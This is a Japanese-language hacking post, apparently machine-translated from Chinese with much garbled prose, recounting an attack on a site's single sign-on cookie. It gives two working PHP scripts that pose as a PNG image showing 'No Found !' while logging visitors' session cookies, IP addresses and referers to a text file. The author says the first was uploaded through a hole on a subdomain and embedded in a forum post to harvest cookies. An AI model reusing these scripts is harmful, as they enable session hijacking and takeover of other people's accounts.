sso役割ドメインはクッキーを盗んで局phpにまたがってpngプログラムコードを生成する


最近、ある大手サイトに浸透し、登録した後、sso技術であることがわかり、登録後、フォーラムなど、どの支局にも登録することができます.戦略が厳格ではないため、別の考え方の駅をまたぐ抜け穴がある.そのssoがクッキーに戻る役割ドメインは.abc.comは、以下のクッキーだけでアクセスできます.分析は以下の通り
Set-Cookie: abcsession=2C521723E6C202D8648F14E9D93C319D; expires=Tue, 08-Nov-41 03:03:12 GMT; path=/; domain=.abc.com

abc.com下某分局hb.abc.comにはアップロードの抜け穴(linxu権限機械が死んで、大馬馬馬の馬の機能をアップロードするなど制限されている)があり、gdズボンがまだあるので、phpをアップロードしてクッキーを捕まえた.
phpはpngとして返され、クッキーをローカルフォルダに保持します.
そこで思い切ってその駅に立った.abc.comフォーラムは画像を発表して、住所は本プログラムの経路です.后ろのは淫らに言わない!
注意:ユーザーが駅をまたいでクッキーを受け取るプログラムではありません!
<?php
date_default_timezone_set("PRC");
header("content-type:image/png"); 
$img=ImageCreate(100,35); 
$bgcolor=ImageColorAllocate($img,0,0,0); 
$red=ImageColorAllocate($img,255,0,0); 
$bgcolortrans=ImageColorTransparent($img,$bgcolor); 
ImageString($img,5,10,10,"No Found !",$red); 
ImagePng($img); 
ImageDestroy($img); 

$cookie="---------".date("Y m d G i s ")."---------
"; foreach ($GLOBALS[_COOKIE] as $key=>$v) { $cookie= $cookie.$key.'='.$v.";"; } $cookie=$cookie."
IP : ".$GLOBALS[REMOTE_ADDR]."
"; $cookie=$cookie." : ".$_SERVER[HTTP_REFERER]."
"; $cookie=$cookie."----------------------------------------

"; $fp=fopen('cook.txt','at'); fwrite($fp,$cookie); fclose($fp); ?>

純粋なクロスステーションクッキーコード:
<?php
date_default_timezone_set("PRC");
header("content-type:image/png"); 
$img=ImageCreate(100,35); 
$bgcolor=ImageColorAllocate($img,0,0,0); 
$red=ImageColorAllocate($img,255,0,0); 
$bgcolortrans=ImageColorTransparent($img,$bgcolor); 
ImageString($img,5,10,10,"No Found !",$red); 
ImagePng($img); 
ImageDestroy($img); 

$cookie="---------".date("Y m d G i s ")."---------
"; $cookie.="Cookie :".$_SERVER[QUERY_STRING]; $cookie.="
IP : ".$GLOBALS[REMOTE_ADDR]."
"; $cookie.=" : ".$_SERVER[HTTP_REFERER]."
"; $cookie.=" : ".$_SERVER[HTTP_USER_AGENT]."
"; $cookie.="----------------------------------------

"; $fp=fopen('cookie.txt','at'); fwrite($fp,$cookie); fclose($fp); ?>